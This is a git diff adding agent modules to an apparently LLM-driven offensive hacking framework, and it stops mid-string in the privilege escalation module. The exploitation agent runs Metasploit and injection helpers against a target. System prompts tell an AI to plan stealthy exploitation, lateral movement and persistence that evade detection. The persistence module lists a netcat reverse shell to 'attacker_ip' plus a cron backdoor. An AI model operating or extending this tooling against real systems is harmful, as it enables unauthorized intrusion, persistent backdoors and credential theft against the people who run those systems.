diff --git a/agents/__init__.py b/agents/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/agents/base_agent.py b/agents/base_agent.py new file mode 100644 index 0000000..c307392 --- /dev/null +++ b/agents/base_agent.py @@ -0,0 +1,78 @@ +import json +import logging +from typing import Dict, Any, List, Optional + +from core.llm_manager import LLMManager + +logger = logging.getLogger(__name__) + +class BaseAgent: + """ + A generic agent class that orchestrates LLM interactions, tool usage, + and adheres to specific agent roles (e.g., Red Team, Blue Team). + """ + def __init__(self, agent_name: str, config: Dict, llm_manager: LLMManager, context_prompts: Dict): + self.agent_name = agent_name + self.config = config + self.llm_manager = llm_manager + self.context_prompts = context_prompts # This will contain user_prompt and system_prompt for this agent role + + self.agent_role_config = self.config.get('agent_roles', {}).get(agent_name, {}) + self.tools_allowed = self.agent_role_config.get('tools_allowed', []) + self.description = self.agent_role_config.get('description', 'No description provided.') + + logger.info(f"Initialized {self.agent_name} agent. Description: {self.description}") + + def _prepare_prompt(self, user_input: str, additional_context: Dict = None) -> str: + """ + Prepares the user prompt for the LLM, incorporating agent-specific instructions + and dynamic context. + """ + user_prompt_template = self.context_prompts.get("user_prompt", "") + if not user_prompt_template: + logger.warning(f"No user prompt template found for agent {self.agent_name}.") + return user_input # Fallback to raw user input + + # Format the user prompt with dynamic context + # Use a safe way to format, ensuring all expected keys are present or handled. + # This assumes the template uses specific placeholders like {target_info_json}, {recon_data_json} etc. + # For a generic solution, we pass all additional_context as a single JSON. + try: + formatted_prompt = user_prompt_template.format( + user_input=user_input, + additional_context_json=json.dumps(additional_context or {}, indent=2) + # Add more specific placeholders if needed, like target_info_json, recon_data_json etc. + # E.g., target_info_json=json.dumps(additional_context.get('target_info', {}), indent=2) + ) + except KeyError as e: + logger.error(f"Missing key in prompt template for {self.agent_name}: {e}. Falling back to basic prompt.") + formatted_prompt = f"{user_prompt_template}\n\nContext: {json.dumps(additional_context or {}, indent=2)}\n\nInput: {user_input}" + + return formatted_prompt + + def execute(self, user_input: str, campaign_data: Dict = None) -> Dict: + """ + Executes the agent's task using the LLM and potentially external tools. + `campaign_data` can be used to pass ongoing results or context between agent executions. + """ + logger.info(f"Executing {self.agent_name} agent for input: {user_input[:50]}...") + + system_prompt = self.context_prompts.get("system_prompt", "") + if not system_prompt: + logger.warning(f"No system prompt found for agent {self.agent_name}. Using generic system prompt.") + system_prompt = f"You are an expert {self.agent_name}. Analyze the provided information and generate a response." 
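+        # context_prompts is expected to carry this role's "user_prompt" and
+        # "system_prompt" pair (loaded from prompts/md_library by the LLM
+        # manager); the generic fallback above only covers roles that lack a
+        # dedicated prompt file.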
+ + # Prepare the user prompt with current input and campaign data + prepared_user_prompt = self._prepare_prompt(user_input, campaign_data) + + llm_response_text = self.llm_manager.generate(prepared_user_prompt, system_prompt) + + # Here's where we would integrate tool usage based on llm_response_text + # and self.tools_allowed. This will be more complex and potentially involve + # re-prompting the LLM or using a function-calling mechanism. + # For now, just return the LLM's direct response. + return {"agent_name": self.agent_name, "input": user_input, "llm_response": llm_response_text} + + def get_allowed_tools(self) -> List[str]: + """Returns the list of tools allowed for this agent role.""" + return self.tools_allowed diff --git a/agents/exploitation_agent.py b/agents/exploitation_agent.py new file mode 100644 index 0000000..a65df97 --- /dev/null +++ b/agents/exploitation_agent.py @@ -0,0 +1,256 @@ +#!/usr/bin/env python3 +""" +Exploitation Agent - Vulnerability exploitation and access gaining +""" + +import json +import logging +from typing import Dict, List +from core.llm_manager import LLMManager +from tools.exploitation import ( + ExploitDatabase, + MetasploitWrapper, + WebExploiter, + SQLInjector, + RCEExploiter, + BufferOverflowExploiter +) + +logger = logging.getLogger(__name__) + + +class ExploitationAgent: + """Agent responsible for vulnerability exploitation""" + + def __init__(self, config: Dict): + """Initialize exploitation agent""" + self.config = config + self.llm = LLMManager(config) + self.exploit_db = ExploitDatabase(config) + self.metasploit = MetasploitWrapper(config) + self.web_exploiter = WebExploiter(config) + self.sql_injector = SQLInjector(config) + self.rce_exploiter = RCEExploiter(config) + self.bof_exploiter = BufferOverflowExploiter(config) + + logger.info("ExploitationAgent initialized") + + def execute(self, target: str, context: Dict) -> Dict: + """Execute exploitation phase""" + logger.info(f"Starting exploitation on {target}") + + results = { + "target": target, + "status": "running", + "successful_exploits": [], + "failed_attempts": [], + "shells_obtained": [], + "credentials_found": [], + "ai_recommendations": {} + } + + try: + # Get reconnaissance data from context + recon_data = context.get("phases", {}).get("recon", {}) + + # Phase 1: Vulnerability Analysis + logger.info("Phase 1: Analyzing vulnerabilities") + vulnerabilities = self._identify_vulnerabilities(recon_data) + + # Phase 2: AI-powered Exploit Selection + logger.info("Phase 2: AI exploit selection") + exploit_plan = self._ai_exploit_planning(vulnerabilities, recon_data) + results["ai_recommendations"] = exploit_plan + + # Phase 3: Execute Exploits + logger.info("Phase 3: Executing exploits") + for vuln in vulnerabilities[:5]: # Limit to top 5 vulnerabilities + exploit_result = self._attempt_exploitation(vuln, target) + + if exploit_result.get("success"): + results["successful_exploits"].append(exploit_result) + logger.info(f"Successful exploit: {vuln.get('type')}") + + # Check for shell access + if exploit_result.get("shell_access"): + results["shells_obtained"].append(exploit_result["shell_info"]) + else: + results["failed_attempts"].append(exploit_result) + + # Phase 4: Post-Exploitation Intelligence + if results["successful_exploits"]: + logger.info("Phase 4: Post-exploitation intelligence gathering") + results["post_exploit_intel"] = self._gather_post_exploit_intel( + results["successful_exploits"] + ) + + results["status"] = "completed" + logger.info("Exploitation phase completed") + 
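+            # The orchestrator (not part of this diff) is assumed to store each
+            # phase's results under context["phases"]; the privilege escalation
+            # agent, for example, reads
+            # context["phases"]["exploitation"]["successful_exploits"] before
+            # choosing escalation paths.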
+ except Exception as e: + logger.error(f"Error during exploitation: {e}") + results["status"] = "error" + results["error"] = str(e) + + return results + + def _identify_vulnerabilities(self, recon_data: Dict) -> List[Dict]: + """Identify exploitable vulnerabilities from recon data""" + vulnerabilities = [] + + # Check network scan results + network_scan = recon_data.get("network_scan", {}) + for host, data in network_scan.get("hosts", {}).items(): + for port in data.get("open_ports", []): + vuln = { + "type": "network_service", + "host": host, + "port": port.get("port"), + "service": port.get("service"), + "version": port.get("version") + } + vulnerabilities.append(vuln) + + # Check web vulnerabilities + web_analysis = recon_data.get("web_analysis", {}) + for vuln_type in ["sql_injection", "xss", "lfi", "rfi", "rce"]: + if web_analysis.get(vuln_type): + vulnerabilities.append({ + "type": vuln_type, + "details": web_analysis[vuln_type] + }) + + return vulnerabilities + + def _ai_exploit_planning(self, vulnerabilities: List[Dict], recon_data: Dict) -> Dict: + """Use AI to plan exploitation strategy""" + prompt = self.llm.get_prompt( + "exploitation", + "ai_exploit_planning_user", + default=f""" +Plan an exploitation strategy based on the following data: + +Vulnerabilities Identified: +{json.dumps(vulnerabilities, indent=2)} + +Reconnaissance Data: +{json.dumps(recon_data, indent=2)} + +Provide: +1. Prioritized exploitation order +2. Recommended exploits for each vulnerability +3. Payload suggestions +4. Evasion techniques +5. Fallback strategies +6. Success probability estimates + +Response in JSON format with detailed exploitation roadmap. +""" + ) + + system_prompt = self.llm.get_prompt( + "exploitation", + "ai_exploit_planning_system", + default="""You are an expert exploit developer and penetration tester. +Create sophisticated exploitation plans considering detection, success rates, and impact. 
+Prioritize stealthy, reliable exploits over noisy attempts.""" + ) + + try: + formatted_prompt = prompt.format( + vulnerabilities_json=json.dumps(vulnerabilities, indent=2), + recon_data_json=json.dumps(recon_data, indent=2) + ) + response = self.llm.generate(formatted_prompt, system_prompt) + return json.loads(response) + except Exception as e: + logger.error(f"AI exploit planning error: {e}") + return {"error": str(e)} + + def _attempt_exploitation(self, vulnerability: Dict, target: str) -> Dict: + """Attempt to exploit a specific vulnerability""" + vuln_type = vulnerability.get("type") + + result = { + "vulnerability": vulnerability, + "success": False, + "method": None, + "details": {} + } + + try: + if vuln_type == "sql_injection": + result = self.sql_injector.exploit(target, vulnerability) + elif vuln_type in ["xss", "csrf"]: + result = self.web_exploiter.exploit(target, vulnerability) + elif vuln_type in ["rce", "command_injection"]: + result = self.rce_exploiter.exploit(target, vulnerability) + elif vuln_type == "buffer_overflow": + result = self.bof_exploiter.exploit(target, vulnerability) + elif vuln_type == "network_service": + result = self._exploit_network_service(target, vulnerability) + else: + # Use Metasploit for generic exploitation + result = self.metasploit.exploit(target, vulnerability) + + except Exception as e: + logger.error(f"Exploitation error for {vuln_type}: {e}") + result["error"] = str(e) + + return result + + def _exploit_network_service(self, target: str, vulnerability: Dict) -> Dict: + """Exploit network service vulnerabilities""" + service = vulnerability.get("service", "").lower() + + # Check exploit database for known exploits + exploits = self.exploit_db.search(service, vulnerability.get("version")) + + if exploits: + logger.info(f"Found {len(exploits)} exploits for {service}") + + for exploit in exploits[:3]: # Try top 3 exploits + result = self.metasploit.run_exploit( + exploit["module"], + target, + vulnerability.get("port") + ) + + if result.get("success"): + return result + + return {"success": False, "message": "No suitable exploits found"} + + def _gather_post_exploit_intel(self, successful_exploits: List[Dict]) -> Dict: + """Gather intelligence after successful exploitation""" + intel = { + "system_info": [], + "user_accounts": [], + "network_info": [], + "installed_software": [], + "credentials": [] + } + + for exploit in successful_exploits: + if exploit.get("shell_access"): + shell = exploit["shell_info"] + + # Gather system information + # This would execute actual commands on compromised system + # Placeholder for demonstration + intel["system_info"].append({ + "os": "detected_os", + "hostname": "detected_hostname", + "architecture": "x64" + }) + + return intel + + def generate_custom_exploit(self, vulnerability: Dict) -> str: + """Generate custom exploit using AI""" + target_info = { + "vulnerability": vulnerability, + "requirements": "Create working exploit code" + } + + return self.llm.generate_payload(target_info, vulnerability.get("type")) diff --git a/agents/lateral_agent.py b/agents/lateral_agent.py new file mode 100644 index 0000000..857fe7d --- /dev/null +++ b/agents/lateral_agent.py @@ -0,0 +1,199 @@ +#!/usr/bin/env python3 +""" +Lateral Movement Agent - Move through the network +""" + +import json +import logging +from typing import Dict, List +from core.llm_manager import LLMManager + +logger = logging.getLogger(__name__) + + +class LateralMovementAgent: + """Agent responsible for lateral movement""" + + def __init__(self, 
config: Dict): + """Initialize lateral movement agent""" + self.config = config + self.llm = LLMManager(config) + logger.info("LateralMovementAgent initialized") + + def execute(self, target: str, context: Dict) -> Dict: + """Execute lateral movement phase""" + logger.info(f"Starting lateral movement from {target}") + + results = { + "target": target, + "status": "running", + "discovered_hosts": [], + "compromised_hosts": [], + "credentials_used": [], + "movement_paths": [], + "ai_analysis": {} + } + + try: + # Get previous phase data + recon_data = context.get("phases", {}).get("recon", {}) + privesc_data = context.get("phases", {}).get("privilege_escalation", {}) + + # Phase 1: Network Discovery + logger.info("Phase 1: Internal network discovery") + results["discovered_hosts"] = self._discover_internal_network(recon_data) + + # Phase 2: AI-Powered Movement Strategy + logger.info("Phase 2: AI lateral movement strategy") + strategy = self._ai_movement_strategy(context, results["discovered_hosts"]) + results["ai_analysis"] = strategy + + # Phase 3: Credential Reuse + logger.info("Phase 3: Credential reuse attacks") + credentials = privesc_data.get("credentials_harvested", []) + results["credentials_used"] = self._attempt_credential_reuse( + results["discovered_hosts"], + credentials + ) + + # Phase 4: Pass-the-Hash/Pass-the-Ticket + logger.info("Phase 4: Pass-the-Hash/Ticket attacks") + results["movement_paths"].extend( + self._pass_the_hash_attacks(results["discovered_hosts"]) + ) + + # Phase 5: Exploit Trust Relationships + logger.info("Phase 5: Exploiting trust relationships") + results["movement_paths"].extend( + self._exploit_trust_relationships(results["discovered_hosts"]) + ) + + results["status"] = "completed" + logger.info("Lateral movement phase completed") + + except Exception as e: + logger.error(f"Error during lateral movement: {e}") + results["status"] = "error" + results["error"] = str(e) + + return results + + def _discover_internal_network(self, recon_data: Dict) -> List[Dict]: + """Discover internal network hosts""" + hosts = [] + + # Extract hosts from recon data + network_scan = recon_data.get("network_scan", {}) + for ip, data in network_scan.get("hosts", {}).items(): + hosts.append({ + "ip": ip, + "ports": data.get("open_ports", []), + "os": data.get("os", "unknown") + }) + + # Simulate additional internal discovery + hosts.extend([ + {"ip": "192.168.1.10", "role": "domain_controller", "status": "discovered"}, + {"ip": "192.168.1.20", "role": "file_server", "status": "discovered"}, + {"ip": "192.168.1.30", "role": "workstation", "status": "discovered"} + ]) + + return hosts + + def _ai_movement_strategy(self, context: Dict, hosts: List[Dict]) -> Dict: + """Use AI to plan lateral movement""" + prompt = self.llm.get_prompt( + "lateral_movement", + "ai_movement_strategy_user", + default=f""" +Plan a lateral movement strategy based on the following: + +Current Context: +{json.dumps(context, indent=2)} + +Discovered Hosts: +{json.dumps(hosts, indent=2)} + +Provide: +1. Target prioritization (high-value targets first) +2. Movement techniques for each target +3. Credential strategies +4. Evasion techniques +5. Attack path optimization +6. Fallback options + +Response in JSON format with detailed attack paths. +""" + ) + + system_prompt = self.llm.get_prompt( + "lateral_movement", + "ai_movement_strategy_system", + default="""You are an expert in lateral movement and Active Directory attacks. +Plan sophisticated movement strategies that minimize detection and maximize impact. 
+Consider Pass-the-Hash, Pass-the-Ticket, RDP, WMI, PSExec, and other techniques. +Prioritize domain controllers and critical infrastructure.""" + ) + + try: + formatted_prompt = prompt.format( + context_json=json.dumps(context, indent=2), + hosts_json=json.dumps(hosts, indent=2) + ) + response = self.llm.generate(formatted_prompt, system_prompt) + return json.loads(response) + except Exception as e: + logger.error(f"AI movement strategy error: {e}") + return {"error": str(e)} + + def _attempt_credential_reuse(self, hosts: List[Dict], credentials: List[Dict]) -> List[Dict]: + """Attempt credential reuse across hosts""" + attempts = [] + + for host in hosts[:5]: # Limit attempts + for cred in credentials[:3]: + attempts.append({ + "host": host.get("ip"), + "credential": "***hidden***", + "protocol": "SMB", + "success": False, # Simulated + "status": "simulated" + }) + + return attempts + + def _pass_the_hash_attacks(self, hosts: List[Dict]) -> List[Dict]: + """Perform Pass-the-Hash attacks""" + attacks = [] + + for host in hosts: + if host.get("role") in ["domain_controller", "file_server"]: + attacks.append({ + "type": "pass_the_hash", + "target": host.get("ip"), + "technique": "SMB relay", + "success": False, # Simulated + "status": "simulated" + }) + + return attacks + + def _exploit_trust_relationships(self, hosts: List[Dict]) -> List[Dict]: + """Exploit trust relationships""" + exploits = [] + + # Domain trust exploitation + exploits.append({ + "type": "domain_trust", + "description": "Cross-domain exploitation", + "status": "simulated" + }) + + # Kerberos delegation + exploits.append({ + "type": "kerberos_delegation", + "description": "Unconstrained delegation abuse", + "status": "simulated" + }) + + return exploits diff --git a/agents/network_recon_agent.py b/agents/network_recon_agent.py new file mode 100644 index 0000000..db36e3f --- /dev/null +++ b/agents/network_recon_agent.py @@ -0,0 +1,148 @@ +#!/usr/bin/env python3 +""" +Network Reconnaissance Agent - Network-focused information gathering and enumeration +""" + +import os +import json +import subprocess +from typing import Dict, List +import logging +from core.llm_manager import LLMManager +from tools.recon import ( + NetworkScanner, + OSINTCollector, + DNSEnumerator, + SubdomainFinder +) +from urllib.parse import urlparse # Added import + +logger = logging.getLogger(__name__) + + +class NetworkReconAgent: + """Agent responsible for network-focused reconnaissance and information gathering""" + + def __init__(self, config: Dict): + """Initialize network reconnaissance agent""" + self.config = config + self.llm = LLMManager(config) + self.network_scanner = NetworkScanner(config) + self.osint = OSINTCollector(config) + self.dns_enum = DNSEnumerator(config) + self.subdomain_finder = SubdomainFinder(config) + + logger.info("NetworkReconAgent initialized") + + def execute(self, target: str, context: Dict) -> Dict: + """Execute network reconnaissance phase""" + logger.info(f"Starting network reconnaissance on {target}") + + results = { + "target": target, + "status": "running", + "findings": [], + "network_scan": {}, + "osint": {}, + "dns": {}, + "subdomains": [], + "ai_analysis": {} + } + + # Parse target to extract hostname if it's a URL + parsed_target = urlparse(target) + target_host = parsed_target.hostname or target # Use hostname if exists, otherwise original target + logger.info(f"Target for network tools: {target_host}") + + try: + # Phase 1: Network Scanning + logger.info("Phase 1: Network scanning") + 
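+            # target_host was derived above so network tools receive a bare
+            # host: e.g. urlparse("https://app.example.com:8443/login").hostname
+            # returns "app.example.com" (scheme, port, and path are dropped).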
results["network_scan"] = self.network_scanner.scan(target_host) # Use target_host + + # Phase 2: DNS Enumeration + logger.info("Phase 2: DNS enumeration") + results["dns"] = self.dns_enum.enumerate(target_host) # Use target_host + + # Phase 3: Subdomain Discovery + logger.info("Phase 3: Subdomain discovery") + results["subdomains"] = self.subdomain_finder.find(target_host) # Use target_host + + # Phase 4: OSINT Collection + logger.info("Phase 4: OSINT collection") + results["osint"] = self.osint.collect(target_host) # Use target_host + + # Phase 5: AI Analysis + logger.info("Phase 5: AI-powered analysis") + results["ai_analysis"] = self._ai_analysis(results) + + results["status"] = "completed" + logger.info("Network reconnaissance phase completed") + + except Exception as e: + logger.error(f"Error during network reconnaissance: {e}") + results["status"] = "error" + results["error"] = str(e) + + return results + + def _ai_analysis(self, recon_data: Dict) -> Dict: + """Use AI to analyze reconnaissance data""" + prompt = self.llm.get_prompt( + "network_recon", + "ai_analysis_user", + default=f""" +Analyze the following network reconnaissance data and provide insights: + +{json.dumps(recon_data, indent=2)} + +Provide: +1. Attack surface summary +2. Prioritized network target list +3. Identified network vulnerabilities or misconfigurations +4. Recommended next steps for network exploitation +5. Network risk assessment +6. Stealth considerations for network activities + +Response in JSON format with actionable recommendations. +""" + ) + + system_prompt = self.llm.get_prompt( + "network_recon", + "ai_analysis_system", + default="""You are an expert network penetration tester analyzing reconnaissance data. +Identify network security weaknesses, network attack vectors, and provide strategic recommendations. 
+Consider both technical and operational security aspects.""" + ) + + try: + # Format the user prompt with recon_data + formatted_prompt = prompt.format(recon_data_json=json.dumps(recon_data, indent=2)) + response = self.llm.generate(formatted_prompt, system_prompt) + return json.loads(response) + except Exception as e: + logger.error(f"AI analysis error: {e}") + return {"error": str(e), "raw_response": response if 'response' in locals() else None} + + def passive_recon(self, target: str) -> Dict: + """Perform passive reconnaissance only""" + # Parse target to extract hostname if it's a URL + parsed_target = urlparse(target) + target_host = parsed_target.hostname or target + + return { + "osint": self.osint.collect(target_host), # Use target_host + "dns": self.dns_enum.enumerate(target_host), # Use target_host + "subdomains": self.subdomain_finder.find(target_host) # Use target_host + } + + def active_recon(self, target: str) -> Dict: + """Perform active reconnaissance""" + # Parse target to extract hostname if it's a URL + parsed_target = urlparse(target) + target_host = parsed_target.hostname or target + + return { + "network_scan": self.network_scanner.scan(target_host) # Use target_host + } + diff --git a/agents/persistence_agent.py b/agents/persistence_agent.py new file mode 100644 index 0000000..2768c86 --- /dev/null +++ b/agents/persistence_agent.py @@ -0,0 +1,250 @@ +#!/usr/bin/env python3 +""" +Persistence Agent - Maintain access to compromised systems +""" + +import json +import logging +from typing import Dict, List +from core.llm_manager import LLMManager + +logger = logging.getLogger(__name__) + + +class PersistenceAgent: + """Agent responsible for maintaining access""" + + def __init__(self, config: Dict): + """Initialize persistence agent""" + self.config = config + self.llm = LLMManager(config) + logger.info("PersistenceAgent initialized") + + def execute(self, target: str, context: Dict) -> Dict: + """Execute persistence phase""" + logger.info(f"Starting persistence establishment on {target}") + + results = { + "target": target, + "status": "running", + "persistence_mechanisms": [], + "backdoors_installed": [], + "scheduled_tasks": [], + "ai_recommendations": {} + } + + try: + # Get previous phase data + privesc_data = context.get("phases", {}).get("privilege_escalation", {}) + + if not privesc_data.get("successful_escalations"): + logger.warning("No privilege escalation achieved. 
Limited persistence options.") + results["status"] = "limited" + + # Phase 1: AI-Powered Persistence Strategy + logger.info("Phase 1: AI persistence strategy") + strategy = self._ai_persistence_strategy(context) + results["ai_recommendations"] = strategy + + # Phase 2: Establish Persistence Mechanisms + logger.info("Phase 2: Establishing persistence mechanisms") + + system_info = privesc_data.get("system_info", {}) + os_type = system_info.get("os", "unknown") + + if os_type == "linux": + results["persistence_mechanisms"].extend( + self._establish_linux_persistence() + ) + elif os_type == "windows": + results["persistence_mechanisms"].extend( + self._establish_windows_persistence() + ) + + # Phase 3: Install Backdoors + logger.info("Phase 3: Installing backdoors") + results["backdoors_installed"] = self._install_backdoors(os_type) + + # Phase 4: Create Scheduled Tasks + logger.info("Phase 4: Creating scheduled tasks") + results["scheduled_tasks"] = self._create_scheduled_tasks(os_type) + + results["status"] = "completed" + logger.info("Persistence phase completed") + + except Exception as e: + logger.error(f"Error during persistence: {e}") + results["status"] = "error" + results["error"] = str(e) + + return results + + def _ai_persistence_strategy(self, context: Dict) -> Dict: + """Use AI to plan persistence strategy""" + prompt = self.llm.get_prompt( + "persistence", + "ai_persistence_strategy_user", + default=f""" +Plan a comprehensive persistence strategy based on the following context: + +{json.dumps(context, indent=2)} + +Provide: +1. Recommended persistence techniques (prioritized) +2. Stealth considerations +3. Resilience against system reboots +4. Evasion of detection mechanisms +5. Multiple fallback mechanisms +6. Cleanup and removal procedures + +Response in JSON format with detailed implementation plan. +""" + ) + + system_prompt = self.llm.get_prompt( + "persistence", + "ai_persistence_strategy_system", + default="""You are an expert in persistence techniques and advanced persistent threats. +Design robust, stealthy persistence mechanisms that survive reboots and detection attempts. +Consider both Windows and Linux environments. 
+Prioritize operational security and longevity.""" + ) + + try: + formatted_prompt = prompt.format(context_json=json.dumps(context, indent=2)) + response = self.llm.generate(formatted_prompt, system_prompt) + return json.loads(response) + except Exception as e: + logger.error(f"AI persistence strategy error: {e}") + return {"error": str(e)} + + def _establish_linux_persistence(self) -> List[Dict]: + """Establish Linux persistence mechanisms""" + mechanisms = [] + + # Cron job + mechanisms.append({ + "type": "cron_job", + "description": "Scheduled task for persistence", + "command": "*/5 * * * * /tmp/.hidden/backdoor.sh", + "status": "simulated" + }) + + # SSH key + mechanisms.append({ + "type": "ssh_key", + "description": "Authorized keys persistence", + "location": "~/.ssh/authorized_keys", + "status": "simulated" + }) + + # Systemd service + mechanisms.append({ + "type": "systemd_service", + "description": "Persistent system service", + "service_name": "system-update.service", + "status": "simulated" + }) + + # bashrc modification + mechanisms.append({ + "type": "bashrc", + "description": "Shell initialization persistence", + "location": "~/.bashrc", + "status": "simulated" + }) + + return mechanisms + + def _establish_windows_persistence(self) -> List[Dict]: + """Establish Windows persistence mechanisms""" + mechanisms = [] + + # Registry Run key + mechanisms.append({ + "type": "registry_run", + "description": "Registry autorun persistence", + "key": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", + "status": "simulated" + }) + + # Scheduled task + mechanisms.append({ + "type": "scheduled_task", + "description": "Windows scheduled task", + "task_name": "WindowsUpdate", + "status": "simulated" + }) + + # WMI event subscription + mechanisms.append({ + "type": "wmi_event", + "description": "WMI persistence", + "status": "simulated" + }) + + # Service installation + mechanisms.append({ + "type": "service", + "description": "Windows service persistence", + "service_name": "WindowsSecurityUpdate", + "status": "simulated" + }) + + return mechanisms + + def _install_backdoors(self, os_type: str) -> List[Dict]: + """Install backdoors""" + backdoors = [] + + if os_type == "linux": + backdoors.extend([ + { + "type": "reverse_shell", + "description": "Netcat reverse shell", + "command": "nc -e /bin/bash attacker_ip 4444", + "status": "simulated" + }, + { + "type": "ssh_backdoor", + "description": "SSH backdoor on alternate port", + "port": 2222, + "status": "simulated" + } + ]) + elif os_type == "windows": + backdoors.extend([ + { + "type": "powershell_backdoor", + "description": "PowerShell reverse shell", + "status": "simulated" + }, + { + "type": "meterpreter", + "description": "Meterpreter payload", + "status": "simulated" + } + ]) + + return backdoors + + def _create_scheduled_tasks(self, os_type: str) -> List[Dict]: + """Create scheduled tasks""" + tasks = [] + + if os_type == "linux": + tasks.append({ + "type": "cron", + "schedule": "*/10 * * * *", + "command": "Callback beacon every 10 minutes", + "status": "simulated" + }) + elif os_type == "windows": + tasks.append({ + "type": "scheduled_task", + "schedule": "Daily at 2 AM", + "command": "Callback beacon", + "status": "simulated" + }) + + return tasks diff --git a/agents/privesc_agent.py b/agents/privesc_agent.py new file mode 100644 index 0000000..61a2675 --- /dev/null +++ b/agents/privesc_agent.py @@ -0,0 +1,305 @@ +#!/usr/bin/env python3 +""" +Privilege Escalation Agent - System privilege elevation +""" + +import json 
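+# The tools.privesc helpers imported below are assumed to ship with this repo
+# and, like the tools.exploitation classes, to accept the shared config dict.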
+import logging +from typing import Dict, List +from core.llm_manager import LLMManager +from tools.privesc import ( + LinuxPrivEsc, + WindowsPrivEsc, + KernelExploiter, + MisconfigFinder, + CredentialHarvester, + SudoExploiter +) + +logger = logging.getLogger(__name__) + + +class PrivEscAgent: + """Agent responsible for privilege escalation""" + + def __init__(self, config: Dict): + """Initialize privilege escalation agent""" + self.config = config + self.llm = LLMManager(config) + self.linux_privesc = LinuxPrivEsc(config) + self.windows_privesc = WindowsPrivEsc(config) + self.kernel_exploiter = KernelExploiter(config) + self.misconfig_finder = MisconfigFinder(config) + self.cred_harvester = CredentialHarvester(config) + self.sudo_exploiter = SudoExploiter(config) + + logger.info("PrivEscAgent initialized") + + def execute(self, target: str, context: Dict) -> Dict: + """Execute privilege escalation phase""" + logger.info(f"Starting privilege escalation on {target}") + + results = { + "target": target, + "status": "running", + "escalation_paths": [], + "successful_escalations": [], + "credentials_harvested": [], + "system_info": {}, + "ai_analysis": {} + } + + try: + # Get exploitation data from context + exploit_data = context.get("phases", {}).get("exploitation", {}) + + if not exploit_data.get("successful_exploits"): + logger.warning("No successful exploits found. Limited privilege escalation options.") + results["status"] = "skipped" + results["message"] = "No initial access obtained" + return results + + # Phase 1: System Enumeration + logger.info("Phase 1: System enumeration") + results["system_info"] = self._enumerate_system(exploit_data) + + # Phase 2: Identify Escalation Paths + logger.info("Phase 2: Identifying escalation paths") + results["escalation_paths"] = self._identify_escalation_paths( + results["system_info"] + ) + + # Phase 3: AI-Powered Path Selection + logger.info("Phase 3: AI escalation strategy") + strategy = self._ai_escalation_strategy( + results["system_info"], + results["escalation_paths"] + ) + results["ai_analysis"] = strategy + + # Phase 4: Execute Escalation Attempts + logger.info("Phase 4: Executing escalation attempts") + for path in results["escalation_paths"][:5]: + escalation_result = self._attempt_escalation(path, results["system_info"]) + + if escalation_result.get("success"): + results["successful_escalations"].append(escalation_result) + logger.info(f"Successful escalation: {path.get('technique')}") + break # Stop after first successful escalation + + # Phase 5: Credential Harvesting + if results["successful_escalations"]: + logger.info("Phase 5: Harvesting credentials") + results["credentials_harvested"] = self._harvest_credentials( + results["system_info"] + ) + + results["status"] = "completed" + logger.info("Privilege escalation phase completed") + + except Exception as e: + logger.error(f"Error during privilege escalation: {e}") + results["status"] = "error" + results["error"] = str(e) + + return results + + def _enumerate_system(self, exploit_data: Dict) -> Dict: + """Enumerate system for privilege escalation opportunities""" + system_info = { + "os": "unknown", + "kernel_version": "unknown", + "architecture": "unknown", + "users": [], + "groups": [], + "sudo_permissions": [], + "suid_binaries": [], + "writable_paths": [], + "scheduled_tasks": [], + "services": [], + "environment_variables": {} + } + + # Determine OS type from exploit data + os_type = self._detect_os_type(exploit_data) + system_info["os"] = os_type + + if os_type == "linux": + 
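+            # Assumption: each platform enumerator returns a dict keyed like the
+            # skeleton above (users, suid_binaries, services, ...), so update()
+            # overlays real findings onto the placeholder values.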
system_info.update(self.linux_privesc.enumerate()) + elif os_type == "windows": + system_info.update(self.windows_privesc.enumerate()) + + return system_info + + def _detect_os_type(self, exploit_data: Dict) -> str: + """Detect operating system type""" + # Placeholder - would analyze exploit data to determine OS + return "linux" # Default assumption + + def _identify_escalation_paths(self, system_info: Dict) -> List[Dict]: + """Identify possible privilege escalation paths""" + paths = [] + os_type = system_info.get("os") + + if os_type == "linux": + # SUID exploitation + for binary in system_info.get("suid_binaries", []): + paths.append({ + "technique": "suid_exploitation", + "target": binary, + "difficulty": "medium", + "likelihood": 0.6 + }) + + # Sudo exploitation + for permission in system_info.get("sudo_permissions", []): + paths.append({ + "technique": "sudo_exploitation", + "target": permission, + "difficulty": "low", + "likelihood": 0.8 + }) + + # Kernel exploitation + if system_info.get("kernel_version"): + paths.append({ + "technique": "kernel_exploit", + "target": system_info["kernel_version"], + "difficulty": "high", + "likelihood": 0.4 + }) + + # Writable path exploitation + for path in system_info.get("writable_paths", []): + if "bin" in path or "sbin" in path: + paths.append({ + "technique": "path_hijacking", + "target": path, + "difficulty": "medium", + "likelihood": 0.5 + }) + + elif os_type == "windows": + # Service exploitation + for service in system_info.get("services", []): + if service.get("unquoted_path") or service.get("weak_permissions"): + paths.append({ + "technique": "service_exploitation", + "target": service, + "difficulty": "medium", + "likelihood": 0.7 + }) + + # AlwaysInstallElevated + if system_info.get("always_install_elevated"): + paths.append({ + "technique": "always_install_elevated", + "target": "MSI", + "difficulty": "low", + "likelihood": 0.9 + }) + + # Token impersonation + paths.append({ + "technique": "token_impersonation", + "target": "SeImpersonatePrivilege", + "difficulty": "medium", + "likelihood": 0.6 + }) + + # Sort by likelihood + paths.sort(key=lambda x: x.get("likelihood", 0), reverse=True) + return paths + + def _ai_escalation_strategy(self, system_info: Dict, escalation_paths: List[Dict]) -> Dict: + """Use AI to optimize escalation strategy""" + prompt = self.llm.get_prompt( + "privesc", + "ai_escalation_strategy_user", + default=f""" +Analyze the system and recommend optimal privilege escalation strategy: + +System Information: +{json.dumps(system_info, indent=2)} + +Identified Escalation Paths: +{json.dumps(escalation_paths, indent=2)} + +Provide: +1. Recommended escalation path (with justification) +2. Step-by-step execution plan +3. Required tools and commands +4. Detection likelihood and evasion techniques +5. Fallback options +6. Post-escalation actions + +Response in JSON format with actionable recommendations. +""" + ) + + system_prompt = self.llm.get_prompt( + "privesc", + "ai_escalation_strategy_system", + default="""You are an expert in privilege escalation techniques. +Analyze systems and recommend the most effective, stealthy escalation paths. +Consider Windows, Linux, and Active Directory environments. 
